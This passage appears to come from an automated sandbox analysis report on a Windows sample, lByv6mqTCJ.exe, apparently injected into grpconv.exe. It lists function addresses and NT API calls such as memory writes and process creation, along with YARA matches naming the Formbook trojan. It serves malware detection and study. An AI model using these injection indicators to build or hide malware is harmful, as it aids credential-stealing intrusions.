          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602AD0 NtReadFile,LdrInitializeThunk,3_2_04602AD0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602B60 NtClose,LdrInitializeThunk,3_2_04602B60
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602BE0 NtQueryValueKey,LdrInitializeThunk,3_2_04602BE0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_04602BF0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_04602BA0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_046035C0 NtCreateMutant,LdrInitializeThunk,3_2_046035C0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_046039B0 NtGetContextThread,LdrInitializeThunk,3_2_046039B0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602C00 NtQueryInformationProcess,3_2_04602C00
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602CF0 NtOpenProcess,3_2_04602CF0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602CC0 NtQueryVirtualMemory,3_2_04602CC0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602D00 NtSetInformationFile,3_2_04602D00
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602DB0 NtEnumerateKey,3_2_04602DB0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602E30 NtWriteVirtualMemory,3_2_04602E30
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602EA0 NtAdjustPrivilegesToken,3_2_04602EA0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602F60 NtCreateProcessEx,3_2_04602F60
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602FA0 NtQuerySection,3_2_04602FA0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602F90 NtProtectVirtualMemory,3_2_04602F90
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602AB0 NtWaitForSingleObject,3_2_04602AB0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04602B80 NtQueryInformationFile,3_2_04602B80
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04603010 NtOpenDirectoryObject,3_2_04603010
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04603090 NtSetValueKey,3_2_04603090
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04603D70 NtOpenThread,3_2_04603D70
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04603D10 NtOpenProcessToken,3_2_04603D10
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_00648CA0 NtCreateFile,3_2_00648CA0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_00648E10 NtReadFile,3_2_00648E10
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_00648F00 NtDeleteFile,3_2_00648F00
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_00648FA0 NtClose,3_2_00648FA0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_00649100 NtAllocateVirtualMemory,3_2_00649100
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_00427FC30_2_00427FC3
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0041F84A0_2_0041F84A
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0041F8530_2_0041F853
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_004110CA0_2_004110CA
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_004110D00_2_004110D0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_004261A30_2_004261A3
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0041FA730_2_0041FA73
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_004112300_2_00411230
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_004122C00_2_004122C0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0041DAF30_2_0041DAF3
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_00412DC00_2_00412DC0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0043E5B30_2_0043E5B3
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_004126400_2_00412640
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018E01AA0_2_018E01AA
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018D41A20_2_018D41A2
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018D81CC0_2_018D81CC
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018101000_2_01810100
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018BA1180_2_018BA118
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018A81580_2_018A8158
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018B20000_2_018B2000
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018E03E60_2_018E03E6
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0182E3F00_2_0182E3F0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018DA3520_2_018DA352
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018A02C00_2_018A02C0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018C02740_2_018C0274
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018E05910_2_018E0591
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018205350_2_01820535
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018CE4F60_2_018CE4F6
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018C44200_2_018C4420
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018D24460_2_018D2446
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0181C7C00_2_0181C7C0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018447500_2_01844750
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018207700_2_01820770
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0183C6E00_2_0183C6E0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018229A00_2_018229A0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018EA9A60_2_018EA9A6
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018369620_2_01836962
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018068B80_2_018068B8
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184E8F00_2_0184E8F0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018228400_2_01822840
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0182A8400_2_0182A840
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018D6BD70_2_018D6BD7
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018DAB400_2_018DAB40
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0181EA800_2_0181EA80
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01838DBF0_2_01838DBF
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0181ADE00_2_0181ADE0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0182AD000_2_0182AD00
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018BCD1F0_2_018BCD1F
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018C0CB50_2_018C0CB5
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01810CF20_2_01810CF2
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01820C000_2_01820C00
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0189EFA00_2_0189EFA0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01812FC80_2_01812FC8
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0182CFE00_2_0182CFE0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01862F280_2_01862F28
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01840F300_2_01840F30
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018C2F300_2_018C2F30
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01894F400_2_01894F40
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01832E900_2_01832E90
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018DCE930_2_018DCE93
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018DEEDB0_2_018DEEDB
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018DEE260_2_018DEE26
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01820E590_2_01820E59
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0182B1B00_2_0182B1B0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018EB16B0_2_018EB16B
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0185516C0_2_0185516C
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0180F1720_2_0180F172
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018CF0CC0_2_018CF0CC
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018270C00_2_018270C0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018D70E90_2_018D70E9
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018DF0E00_2_018DF0E0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0186739A0_2_0186739A
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018D132D0_2_018D132D
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0180D34C0_2_0180D34C
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018252A00_2_018252A0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0183B2C00_2_0183B2C0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018C12ED0_2_018C12ED
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018BD5B00_2_018BD5B0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018E95C30_2_018E95C3
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018D75710_2_018D7571
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018DF43F0_2_018DF43F
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018114600_2_01811460
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018DF7B00_2_018DF7B0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018D16CC0_2_018D16CC
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018656300_2_01865630
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018B59100_2_018B5910
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018299500_2_01829950
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0183B9500_2_0183B950
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018238E00_2_018238E0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0188D8000_2_0188D800
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0183FB800_2_0183FB80
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01895BF00_2_01895BF0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0185DBF90_2_0185DBF9
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018DFB760_2_018DFB76
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01865AA00_2_01865AA0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018BDAAC0_2_018BDAAC
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018C1AA30_2_018C1AA3
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018CDAC60_2_018CDAC6
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018DFA490_2_018DFA49
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018D7A460_2_018D7A46
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01893A6C0_2_01893A6C
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0183FDC00_2_0183FDC0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01823D400_2_01823D40
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018D1D5A0_2_018D1D5A
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018D7D730_2_018D7D73
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018DFCF20_2_018DFCF2
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01899C320_2_01899C32
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01821F920_2_01821F92
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018DFFB10_2_018DFFB1
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018DFF090_2_018DFF09
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_017E3FD50_2_017E3FD5
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_017E3FD20_2_017E3FD2
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01829EB00_2_01829EB0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_046824463_2_04682446
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_046744203_2_04674420
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0467E4F63_2_0467E4F6
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045D05353_2_045D0535
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_046905913_2_04690591
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045EC6E03_2_045EC6E0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045F47503_2_045F4750
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045D07703_2_045D0770
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045CC7C03_2_045CC7C0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_046620003_2_04662000
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_046581583_2_04658158
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045C01003_2_045C0100
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0466A1183_2_0466A118
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_046881CC3_2_046881CC
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_046901AA3_2_046901AA
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_046841A23_2_046841A2
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_046702743_2_04670274
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_046502C03_2_046502C0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0468A3523_2_0468A352
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_046903E63_2_046903E6
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045DE3F03_2_045DE3F0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045D0C003_2_045D0C00
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045C0CF23_2_045C0CF2
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04670CB53_2_04670CB5
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045DAD003_2_045DAD00
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0466CD1F3_2_0466CD1F
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045CADE03_2_045CADE0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045E8DBF3_2_045E8DBF
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045D0E593_2_045D0E59
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0468EE263_2_0468EE26
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0468EEDB3_2_0468EEDB
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045E2E903_2_045E2E90
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0468CE933_2_0468CE93
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04644F403_2_04644F40
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04612F283_2_04612F28
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04672F303_2_04672F30
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045F0F303_2_045F0F30
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045C2FC83_2_045C2FC8
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045DCFE03_2_045DCFE0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0464EFA03_2_0464EFA0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045DA8403_2_045DA840
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045D28403_2_045D2840
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045FE8F03_2_045FE8F0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045B68B83_2_045B68B8
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045E69623_2_045E6962
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0469A9A63_2_0469A9A6
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045D29A03_2_045D29A0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045CEA803_2_045CEA80
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0468AB403_2_0468AB40
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04686BD73_2_04686BD7
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045C14603_2_045C1460
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0468F43F3_2_0468F43F
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_046875713_2_04687571
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_046995C33_2_046995C3
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0466D5B03_2_0466D5B0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_046156303_2_04615630
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_046816CC3_2_046816CC
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0468F7B03_2_0468F7B0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_046870E93_2_046870E9
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0468F0E03_2_0468F0E0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045D70C03_2_045D70C0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0467F0CC3_2_0467F0CC
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0469B16B3_2_0469B16B
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0460516C3_2_0460516C
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045BF1723_2_045BF172
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045DB1B03_2_045DB1B0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_046712ED3_2_046712ED
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045EB2C03_2_045EB2C0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045D52A03_2_045D52A0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045BD34C3_2_045BD34C
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0468132D3_2_0468132D
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0461739A3_2_0461739A
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04649C323_2_04649C32
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0468FCF23_2_0468FCF2
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04687D733_2_04687D73
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045D3D403_2_045D3D40
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04681D5A3_2_04681D5A
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045EFDC03_2_045EFDC0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045D9EB03_2_045D9EB0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0468FF093_2_0468FF09
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04593FD23_2_04593FD2
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04593FD53_2_04593FD5
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045D1F923_2_045D1F92
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0468FFB13_2_0468FFB1
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0463D8003_2_0463D800
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045D38E03_2_045D38E0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045D99503_2_045D9950
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045EB9503_2_045EB950
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_046659103_2_04665910
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04643A6C3_2_04643A6C
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0468FA493_2_0468FA49
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04687A463_2_04687A46
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0467DAC63_2_0467DAC6
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04615AA03_2_04615AA0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04671AA33_2_04671AA3
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0466DAAC3_2_0466DAAC
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0468FB763_2_0468FB76
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_04645BF03_2_04645BF0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0460DBF93_2_0460DBF9
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_045EFB803_2_045EFB80
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_006318D03_2_006318D0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0062C8073_2_0062C807
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0062C8103_2_0062C810
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0062CA303_2_0062CA30
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0062AAB03_2_0062AAB0
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_00634F803_2_00634F80
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_006331603_2_00633160
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0064B5703_2_0064B570
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_044335593_2_04433559
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0442E6EF3_2_0442E6EF
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0442D7583_2_0442D758
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0442E2353_2_0442E235
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0442E3533_2_0442E353
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: 3_2_0442CA033_2_0442CA03
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: String function: 04605130 appears 58 times
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: String function: 0464F290 appears 105 times
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: String function: 04617E54 appears 111 times
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: String function: 045BB970 appears 280 times
          Source: C:\Windows\SysWOW64\grpconv.exeCode function: String function: 0463EA12 appears 86 times
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: String function: 0180B970 appears 280 times
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: String function: 01855130 appears 58 times
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: String function: 0189F290 appears 105 times
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: String function: 01867E54 appears 111 times
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: String function: 0188EA12 appears 86 times
          Source: lByv6mqTCJ.exeStatic PE information: No import functions for PE file found
          Source: lByv6mqTCJ.exe, 00000000.00000002.2132478501.000000000190D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs lByv6mqTCJ.exe
          Source: lByv6mqTCJ.exe, 00000000.00000003.2028568483.000000000175E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs lByv6mqTCJ.exe
          Source: lByv6mqTCJ.exe, 00000000.00000003.2026593857.00000000015AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs lByv6mqTCJ.exe
          Source: lByv6mqTCJ.exe, 00000000.00000003.2097880175.000000000139D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGRPCONV.EXEj% vs lByv6mqTCJ.exe
          Source: lByv6mqTCJ.exe, 00000000.00000003.2131424199.00000000013B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGRPCONV.EXEj% vs lByv6mqTCJ.exe
          Source: lByv6mqTCJ.exe, 00000000.00000003.2097880175.00000000013B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGRPCONV.EXEj% vs lByv6mqTCJ.exe
          Source: lByv6mqTCJ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 0.2.lByv6mqTCJ.exe.410000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.3876568128.0000000004330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
